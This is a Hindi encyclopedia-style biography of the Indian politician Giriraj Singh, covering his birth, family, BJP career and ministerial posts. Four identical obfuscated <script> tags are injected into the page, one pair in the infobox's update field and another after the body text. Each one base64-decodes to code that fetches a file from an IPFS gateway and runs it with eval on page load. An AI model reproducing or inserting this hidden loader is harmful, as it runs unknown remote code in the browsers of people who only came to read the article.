गिरिराज सिंह
गिरिराज सिंह
| |
पूरा नाम | गिरिराज सिंह |
जन्म | 8 सितंबर, 1952 |
जन्म भूमि | लखीसराय, बिहार |
अभिभावक | पिता- राम अवतार सिंह, माता- तारा देवी |
पति/पत्नी | उमा सिन्हा |
संतान | एक पुत्री |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
कार्य काल | ग्रामीण विकास मंत्री- 7 जुलाई, 2021 से पंचायती राज मंत्री- 7 जुलाई, 2021 से |
शिक्षा | स्नातक |
विद्यालय | मगध विश्वविद्यालय |
अन्य जानकारी | भाजयुमो के बेगूसराय, समस्तीपुर व खगडिय़ा के संगठन प्रभारी रहने के साथ 1990 में गिरिराज सिंह प्रदेश भाजयुमो की टीम में महासचिव बने थे। |
अद्यतन | 18:24, 10 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
गिरिराज सिंह (अंग्रेज़ी: Giriraj Singh, जन्म- 8 सितंबर, 1952, लखीसराय, बिहार) भारतीय जनता पार्टी के राजनीतिज्ञ हैं। वह भारत की सत्रहवीं लोकसभा में सांसद हैं। पहले उन्हें 'पशुपालन, डेयरी और मत्स्य पालन' मंत्री बनाया गया था, किंतु 7 जुलाई, 2021 को मोदी मंत्रिमंडल में विस्तार और फेरबदल के बाद उन्हें 'ग्रामीण विकास मंत्री और पंचायती राज मंत्री' बनाया गया है। वर्ष 2014 के चुनावों में गिरिराज सिंह ने बिहार की नवादा सीट से भाजपा केे टिकट पर जीत हासिल की थी। वह केेन्द्र में राज्य मंत्री भी रहे हैं।
परिचय
गिरिराज सिंह का जन्म 8 सितंबर, 1952 को बरहिया, लखीसराय, बिहार में हुआ था। स्नातक करने के बाद गिरिराज सिंह ने एक नामी गिरामी कंपनी की पंप सेट की एजेंसी लेकर बेगूसराय में ही व्यवसाय की शुरुआत की। यहीं एक विवाह समारोह में उनकी मुलाकात भाजपा नेता कैलाशपति मिश्र से हुई। उनसे प्रेरित व प्रोत्साहित होकर उन्होंने भाजपा का दामन थामा और वर्ष 1985-1986 में पटना चले गए। वहां वे भाजयुमो से जुड़ गए।
राजनीतिक सफर
भाजयुमो के बेगूसराय, समस्तीपुर व खगडिय़ा के संगठन प्रभारी रहने के साथ 1990 में गिरिराज सिंह प्रदेश भाजयुमो की टीम में महासचिव बने। भाजयुमो में उनके साथ काम करने वाले भाजपा नेता अमरेंद्र कुमार अमर, वशिष्ठ नारायण सिंह के अनुसार- "गिरिराज सिंह की सेवा और संघर्ष का सरोकार बेगूसराय से ही रहा है, इसलिए बेगूसराय उनकी सिर्फ कर्मभूमि नहीं, बल्कि राजनीतिक जन्मभूमि भी है।"
गिरिराज सिंह नरेन्द्र मोदी के कैबिनेट में मंत्री बने। जब नरेंद्र मोदी ने दोबारा प्रधानमंत्री पद की शपथ ली, तब इसके साथ ही बिहार से सांसद गिरिराज सिंह ने भी कैबिनेट मंत्री के रूप में शपथ ली। लोकसभा चुनाव, 2019 में गिरिराज सिंह बिहार के बेगूसराय से सांसद निर्वाचित हुए हैं। 2014 में वह बिहार के नवादा से सांसद निर्वाचित हुए थे। बेगूसराय में उनकी कांटों की टक्कर थी। गिरिराज सिंह ने सीपीएम प्रत्याशी कन्हैया कुमार को पटखनी दी। गिरिराज सिंह पिछली मोदी सरकार में सूक्ष्म, लघु और मध्यम उद्यम मंत्रालय के स्वतंत्र प्रभारी थे।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|